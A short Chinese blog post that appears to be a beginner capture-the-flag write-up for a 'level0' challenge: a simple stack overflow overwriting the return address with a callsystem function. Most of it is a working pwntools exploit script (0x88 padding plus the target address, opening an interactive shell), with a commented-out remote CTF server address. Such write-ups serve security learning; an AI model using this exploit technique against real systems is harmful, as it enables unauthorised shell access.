新手练习05-level0
2019-02-18 本文已影响0人
n0va
简单的栈溢出
image.png
覆盖返回地址为callsystem即可
exp:
from pwn import *
p = process('./level0')
# p = remote("111.198.29.45","31008")
call_system = 0x400596
payload = 0x88*'a' + p64(call_system)
p.sendline(payload)
p.interactive()
